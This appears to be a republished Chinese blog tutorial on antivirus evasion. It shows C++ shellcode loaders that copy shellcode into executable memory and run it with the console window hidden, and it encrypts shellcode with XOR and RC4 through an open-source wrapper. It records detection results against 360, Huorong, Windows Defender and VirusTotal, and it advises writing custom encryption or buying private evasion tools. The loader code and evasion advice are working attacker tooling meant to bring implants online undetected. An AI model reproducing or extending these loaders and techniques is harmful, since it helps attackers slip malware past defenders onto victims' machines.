当前位置：首页 > news >正文

免杀对抗—C++混淆算法shellcode上线回调编译执行

news 2026/2/7 11:19:13

前言

上次讲了python混淆免杀，今天讲一下C++混淆免杀。其实都大差不差的，也都是通过各种算法对shellcod进行混淆免杀，只不过是语言从python换成c++了而已。

实验环境

测试环境依旧是360、火绒、WD还有VT。

shellcode上线

下面是最基本几个shellcode加载器和运行代码。

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")   //windows控制台程序不出黑窗口
unsigned char buf[] =" ";
int main()
{//方式一：指针执行/* ((void(*)(void)) & buf)();*///方式二：强制类型转换//((void(WINAPI*)(void))&buf)();//方式三：申请动态内存加载/*char* Memory;Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, buf, sizeof(buf));((void(*)())Memory)();*///方式四：嵌入汇编加载//__asm {//lea eax,buf//call eax//}//方式五：汇编花指令//__asm{//mov eax, offset shellcode//_emit 0xFF//_emit 0xE0//}
}

C++呢它不能像python那样直接运行就可以上线，必须生成exe才可以进行上线。顺便说一下如果你生成的shellcode是64位的，那么编译成exe也要选择64位的，同时选择release发布版本，如果你选择debug版本的话，在运行的时候可能会出错，说缺DLL啥的。

生成exe。

但是不知道为啥运行不了，黑窗弹出来然后马上就没了，命令运行也没见啥报错，奇怪了。

虚拟机运行报错如下，有了解的还请解答一下。

后来我又找了一个加载器，不同于上面四个的，这个就可以成功运行。

void main()
{LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (Memory == NULL) { return; }memcpy(Memory, shellcode, sizeof(shellcode));((void(*)())Memory)();
}

不用说，原生态的肯定会被查杀的。

加载器免杀

上篇文章说了，除了对shellcode进行混淆之外，还可以对加载器进行免杀。这是我从github找的开源项目，反正就是换各种奇奇怪怪的加载器来执行shellcode，但是效果就不怎么好的，基本没有免杀成功的，就不一个个测试了。

shellcode免杀

我们利用ShellcodeWrapper这个脚本进行免杀，对我们的shellcode进行异或，或者是RC4加密。

下载地址：GitHub - Ch1ngg/ShellcodeWrapperModify: Shellcode wrapper with encryption for multiple target languages

XOR

先生成一个raw格式的shellcode。

这个项目用法也简单，-cpp就是加密后生成一个c++的源文件，-CS就是生成C#的源文件，-py这些也同样的道理。

./shellcode_encoder.py -cpp -cs -py -bin -go 3.bin xor

把c++的编译一下，测试效果，其它语言自己测试就好。火绒一落地就杀了，都还没检测。

WD也是一落地就杀了。

360也杀了。

VT有41个引擎检测到，免杀效果很差，不过也正常20年的项目了，现在都不更新了。

RC4

试试RC4看看效果如何，火绒杀掉了。

360也杀掉了

WD也不行。

说明这个项目确实没啥用了，VT就不测试了。

总结

思路就是用C++来写算法对shellcode加密，以此来逃过杀软的检测。C++的免杀效果不太好，想要达到更好的免杀效果，一个就是换其他语言，比如go啊、python啊。还有就是加密脚本尽量自己写，因为网上公开的脚本，只要用的人多了，杀软就会提取它的特征加入特征库，所以这就是为啥公开的很快就失效了。并不是说自己写的脚本加密方式有多复杂，而是避开了那些特征。还有就是可以进别人的星球去买内部的免杀资源，这样的效果会好很多。

最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

免杀对抗—C++混淆算法shellcode上线回调编译执行

前言

实验环境

shellcode上线

加载器免杀

shellcode免杀

XOR

RC4

总结

相关文章：

免杀对抗—C++混淆算法shellcode上线回调编译执行

考研数据结构——C语言实现插入排序

苍穹外卖学习笔记(十三)

如果没有pos信息，只有一些近景的照片，可以用编辑重建大师进行建模吗？

智能感知，主动防御：移动云态势感知为政企安全护航

论文笔记（四十六）RobotGPT: Robot Manipulation Learning From ChatGPT

docker - 镜像操作（拉取、查看、删除）

如何选择数据库架构

Mysql高级篇（中）——锁机制

JavaWeb图书借阅系统

文档矫正算法：DocTr++

Vxe UI vue vxe-table vxe-grid 单元格与表尾单元格如何格式化数据

【百日算法计划】：每日一题，见证成长（021）

数据恢复篇：如何恢复几年前删除的照片

前端注释规范

uniapp踩坑 tabbar页面数据刷新了但视图没有更新

WebAssembly与WebGPU：游戏开发的新时代

SAP B1 认证考试习题 - 解析版（二）

《Ubuntu20.04环境下的ROS进阶学习7》

免费视频无损压缩工具+预览视频生成工具

模型参数、模型存储精度、参数与显存

3.3.1_1 检错编码（奇偶校验码）

【大模型RAG】Docker 一键部署 Milvus 完整攻略

pikachu靶场通关笔记22-1 SQL注入05-1-insert注入(报错法)

【开发技术】.Net使用FFmpeg视频特定帧上绘制内容

有限自动机到正规文法转换器v1.0

rnn判断string中第一次出现a的下标

在QWebEngineView上实现鼠标、触摸等事件捕获的解决方案

基于Java+MySQL实现（GUI）客户管理系统

基于SpringBoot在线拍卖系统的设计和实现